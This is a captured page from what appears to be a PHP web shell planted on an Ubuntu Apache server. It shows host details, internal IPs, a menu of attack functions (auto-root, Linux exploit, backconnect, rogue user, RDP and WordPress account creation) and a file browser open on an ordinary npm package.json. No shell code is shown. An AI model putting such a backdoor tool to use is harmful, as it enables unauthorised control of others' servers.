Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
axobject-query /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxrwxr-x
CHANGELOG.md
3.53
KB
-rw-rw-r--
LICENSE
10
KB
-rwxrwxr-x
README.md
20.88
KB
-rw-rw-r--
package.json
1.72
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "axobject-query", "version": "3.2.1", "description": "Programmatic access to information about the AXObject Model", "main": "lib/index.js", "files": [ "lib" ], "scripts": { "build": "rimraf lib && babel src --out-dir lib", "flow": "flow", "lint": "eslint --config .eslintrc src __tests__ scripts", "lint:fix": "npm run lint -- --fix", "pretest": "npm run lint:fix && npm run flow", "test": "npm run jest", "test:ci": "npm run jest -- --ci --runInBand", "jest": "jest --coverage __tests__/**/*" }, "repository": { "type": "git", "url": "git+https://github.com/A11yance/axobject-query.git" }, "keywords": [ "accessibility" ], "author": "Jesse Beach <splendidnoise@gmail.com>", "license": "Apache-2.0", "bugs": { "url": "https://github.com/A11yance/axobject-query/issues" }, "homepage": "https://github.com/A11yance/axobject-query#readme", "devDependencies": { "@babel/cli": "^7.19.3", "@babel/core": "^7.19.6", "@babel/eslint-parser": "^7.19.1", "@babel/preset-env": "^7.19.4", "@babel/preset-flow": "^7.18.6", "babel-jest": "^29.2.1", "eslint": "^8.26.0", "eslint-config-airbnb-base": "^15.0.0", "eslint-plugin-flowtype": "^8.0.3", "eslint-plugin-import": "^2.26.0", "eslint-plugin-jest": "^27.1.3", "expect": "^29.2.1", "flow-bin": "^0.190.1", "flow-typed": "^3.8.0", "jest": "^29.2.1", "rimraf": "^3.0.2" }, "jest": { "coverageReporters": [ "lcov" ], "coverageDirectory": "reports", "roots": [ "<rootDir>/__tests__" ] }, "browserslist": [ ">0.2%", "not dead", "not op_mini all", "ie 11" ], "dependencies": { "dequal": "^2.0.3" } }
Close